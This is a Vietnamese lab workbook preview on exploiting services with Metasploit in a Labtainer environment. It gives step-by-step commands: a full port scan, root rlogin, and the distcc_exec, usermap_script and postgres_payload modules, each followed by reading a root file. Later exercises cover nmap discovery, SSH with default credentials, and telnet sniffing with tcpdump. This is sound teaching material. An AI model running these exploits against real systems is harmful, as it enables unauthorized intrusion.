Tải bản đầy đủ (.docx) (12 trang)

Bài 1 khai thác lỗ hổng dịch vụ sử dụng metasploit

Bạn đang xem bản rút gọn của tài liệu. Xem và tải ngay bản đầy đủ của tài liệu tại đây (3.73 MB, 12 trang )

<span class="text_page_counter">Trang 1</span><div class="page_container" data-page="1">

<b>Bài 1: Khai thác lỗ hổng dịch vụ sử dụng Metasploit</b>

<small>Bước 1: labtainer -r metasploit</small>

<small> Bước 2: </small>ifconfig

</div><span class="text_page_counter">Trang 2</span><div class="page_container" data-page="2">

<small>Bước 3: Kiểm tra kết nối bằng ping</small>

<small>Bước 4: Quét các dịch vụ có thể tấn công: nmap -p0-65535 192.168.1.2</small>

</div><span class="text_page_counter">Trang 3</span><div class="page_container" data-page="3">

<small>Bước 5: Khai thác dịch vụ cổng 513: rlogin -l root 192.168.1.2</small>

</div><span class="text_page_counter">Trang 4</span><div class="page_container" data-page="4">

<small>-Trên terminal gõ: “sudo msfconsole”</small>

<small>-Tìm và tấn công dịch vụ distccd: </small><i>search distccd</i>

<small>-Sử dụng công cụ khai thác: use exploit/unix/misc/distcc_exec</small>

</div><span class="text_page_counter">Trang 5</span><div class="page_container" data-page="5">

<i>- Xem cấu hình liên quan đến exploit: options</i>

<i>- Đặt RHOST: set RHOST 192.168.1.2</i>

</div><span class="text_page_counter">Trang 6</span><div class="page_container" data-page="6">

- Khai thác lỗ hổng: exploit

- Đọc file <i>: cat /root/filetoview.txt</i>

</div><span class="text_page_counter">Trang 7</span><div class="page_container" data-page="7">

Bước 8: Khai thác lỗ hổng IRC daemon (cổng 6667): Các bước thực hiện tương

Bước 10: Khai thác dịch vụ Samba service (cổng 139):

<i> “sudo msfconsole” -> search usermap_script-></i>

<i>->set RHOST 192.168.1.2->exploit->cat /root/filetoview.txt</i>

Bước 12: Khai thác dịch vụ Postgres (cổng 5432):

</div><span class="text_page_counter">Trang 8</span><div class="page_container" data-page="8">

<i> “sudo msfconsole” -> search postgres_payload->use exploit/linux/postgres/postgres_payload->set RHOST 192.168.1.2->exploit</i>

<i>->cat /root/filetoview.txt</i>

<i>Bước 13: Kết thúc bài lab: stoplab metasploit</i>

<b>Bài 4: Phát hiện các lỗ hổng bảo mật sử dụng công cụ rà quétBước 1: </b>Xác định IP của máy

<b>Bước 2: Trên máy khách </b><i><b>mycomputer </b></i>sử dụng nmap để tìm ra địa chỉ IP của

</div><span class="text_page_counter">Trang 9</span><div class="page_container" data-page="9">

<i><b>nmap để tìm cổng dịch vụ đang mở trên máy friedshrimp biết rằng cổng (port) </b></i>

nằm từ 2000-3000.

<b>Bước 3: Sau khi xác định được cổng ssh đang mở. Sử dụng ssh để truy cập vào </b>

máy chủ. Tên máy chủ và mật khẩu là: ubuntu.

</div><span class="text_page_counter">Trang 10</span><div class="page_container" data-page="10">

Bước 4: <i><b>Sau khi truy cập được vào máy chủ friedshrimp đi tìm file</b></i>

friedshrimp.txt. Mở và đọc file.

Bước 5: Kết thúc bài lab:<small> stoplab nmap-discovery</small>

<b>Bài 9: Sử dụng công cụ truy cập từ xa</b>

</div><span class="text_page_counter">Trang 11</span><div class="page_container" data-page="11">

<b>Bước 1: </b>Xác định IP của các máy

<b>Bước 2: </b>Trên máy khách sử dụng telnet để kết nối với máy chủ thông qua địa chỉ IP

<b>Bước 3: </b>Sau khi đăng nhập vào máy chủ, thực hiện việc đọc tệp có sẵn chứa đoạn mật mã

</div><span class="text_page_counter">Trang 12</span><div class="page_container" data-page="12">

<b>Bước 4: </b>Trên server, chạy tcpdump để hiển thị lưu lượng mạng TCP và Thực hiện ssh từ máy khách vào máy chủ và đọc dữ liệu trên máy chủ

<i>Bước 5: Kết thúc bài lab: stoplab telnetlab</i>

</div>

×